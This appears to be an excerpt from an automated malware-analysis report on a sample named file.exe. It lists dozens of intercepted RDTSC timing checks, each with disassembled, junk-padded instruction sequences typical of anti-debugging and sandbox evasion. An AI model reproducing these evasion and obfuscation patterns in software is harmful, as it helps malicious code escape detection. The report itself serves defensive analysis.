                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38F8 second address: 9D397C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7F1511CE26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7F1511CE28h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 pushad 0x0000002a pushad 0x0000002b movzx edx, ax 0x0000002e jmp 00007F7F1511CE2Dh 0x00000033 popad 0x00000034 mov edx, ebx 0x00000036 popad 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D2C98h], esi 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F7F1511CE28h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F7F1511CE2Fh 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D397C second address: 9D399A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F147AEA54h 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D399A second address: 9D399F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D399F second address: 9D39A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992DFA second address: 992E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D8BE1 second address: 9D8BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DABDE second address: 9DABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE39h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DABFC second address: 9DAC06 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D9DA5 second address: 9D9E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D5769h], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F7F1511CE28h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov bx, AFBAh 0x00000033 xor edi, 09865B4Ch 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, edi 0x00000042 mov eax, dword ptr [ebp+122D10E5h] 0x00000048 mov bl, A0h 0x0000004a push FFFFFFFFh 0x0000004c mov bx, dx 0x0000004f nop 0x00000050 push ecx 0x00000051 pushad 0x00000052 push ecx 0x00000053 pop ecx 0x00000054 jp 00007F7F1511CE26h 0x0000005a popad 0x0000005b pop ecx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jnc 00007F7F1511CE26h 0x00000066 jmp 00007F7F1511CE2Ah 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBC5F second address: 9DBC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBC65 second address: 9DBC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBE25 second address: 9DBE2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBE2B second address: 9DBE30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB4C second address: 9DDB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDB53 second address: 9DDBEA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F1511CE39h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F7F1511CE28h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jmp 00007F7F1511CE38h 0x00000030 push 00000000h 0x00000032 movsx ebx, ax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F7F1511CE28h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D2CE9h], eax 0x00000057 xchg eax, esi 0x00000058 jng 00007F7F1511CE30h 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 pop esi 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDD72 second address: 9DDD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFC73 second address: 9DFCAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7F1511CE34h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c or di, 8F74h 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D318Ah] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007F7F1511CE2Ch 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DED05 second address: 9DED09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DEDBC second address: 9DEDC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0BBB second address: 9E0BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Ch 0x00000009 popad 0x0000000a jmp 00007F7F147AEA55h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jnp 00007F7F147AEA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFE78 second address: 9DFE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFE7C second address: 9DFE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFE89 second address: 9DFE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1CEC second address: 9E1CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2C07 second address: 9E2C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2C0B second address: 9E2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2C11 second address: 9E2C61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7F1511CE33h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 461FDFE3h 0x00000013 push 00000000h 0x00000015 mov ebx, edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F7F1511CE28h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3E06 second address: 9E3E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3E28 second address: 9E3E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3E2D second address: 9E3E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4E90 second address: 9E4F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7F1511CE26h 0x00000009 jmp 00007F7F1511CE39h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 xor dword ptr [ebp+122D311Ch], edi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1A81h], ecx 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F7F1511CE28h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov edi, dword ptr [ebp+122D2B23h] 0x00000044 and ebx, dword ptr [ebp+122D18FCh] 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e jo 00007F7F1511CE26h 0x00000054 pop esi 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4F00 second address: 9E4F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7F147AEA46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4F0A second address: 9E4F23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jns 00007F7F1511CE26h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1E59 second address: 9E1F22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F147AEA57h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F147AEA48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, eax 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx ebx, si 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+122D28F6h], ecx 0x00000044 mov eax, dword ptr [ebp+122D00D9h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F7F147AEA48h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2AA3h] 0x0000006a push FFFFFFFFh 0x0000006c jmp 00007F7F147AEA4Fh 0x00000071 nop 0x00000072 pushad 0x00000073 jnl 00007F7F147AEA4Ch 0x00000079 jnl 00007F7F147AEA48h 0x0000007f popad 0x00000080 push eax 0x00000081 push ecx 0x00000082 push eax 0x00000083 push edx 0x00000084 jbe 00007F7F147AEA46h 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E0D94 second address: 9E0D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C8D second address: 9E5C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C91 second address: 9E5C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5C95 second address: 9E5CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F7F147AEA48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D28EFh], ecx 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D31C7h], ecx 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5CD2 second address: 9E5CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5ED6 second address: 9E5EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5EEB second address: 9E5EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F1511CE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7DC2 second address: 9E7DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7DC6 second address: 9E7E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7F1511CE33h 0x0000000c jmp 00007F7F1511CE2Dh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push edx 0x00000016 mov bx, di 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F7F1511CE28h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 jl 00007F7F1511CE2Ch 0x0000003c mov dword ptr [ebp+122D35FCh], ebx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007F7F1511CE28h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e mov bh, 25h 0x00000060 mov dword ptr [ebp+122D3124h], edx 0x00000066 xchg eax, esi 0x00000067 pushad 0x00000068 jmp 00007F7F1511CE2Dh 0x0000006d push eax 0x0000006e push edx 0x0000006f ja 00007F7F1511CE26h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7E5A second address: 9E7E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EA351 second address: 9EA356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7F8A second address: 9E7F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F7F147AEA48h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8044 second address: 9E804A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E804A second address: 9E8062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA54h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EC9E8 second address: 9EC9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0BF1 second address: 9F0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0BF7 second address: 9F0C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F7F1511CE26h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F0C06 second address: 9F0C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F058A second address: 9F058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F058E second address: 9F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F147AEA54h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F06F4 second address: 9F06F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98722F second address: 987234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F61CE second address: 9F61D8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F61D8 second address: 9F61DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD00 second address: 9FBD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FBD06 second address: 9FBD10 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC7F6 second address: 9FC807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC807 second address: 9FC80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC80D second address: 9FC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06D7A second address: A06D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7F147AEA46h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA4Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06D95 second address: A06D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06D99 second address: A06DC4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 jnc 00007F7F147AEA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F7F147AEA53h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06DC4 second address: A06DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06DC8 second address: A06DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06DD3 second address: A06DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06DD8 second address: A06DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06DE9 second address: A06DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05ACE second address: A05AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 jng 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C68 second address: A05C87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7F1511CE2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F7F1511CE26h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C87 second address: A05C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C8D second address: A05C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C91 second address: A05C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C95 second address: A05CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06087 second address: A0608B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0608B second address: A0608F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06202 second address: A0620E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA46h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
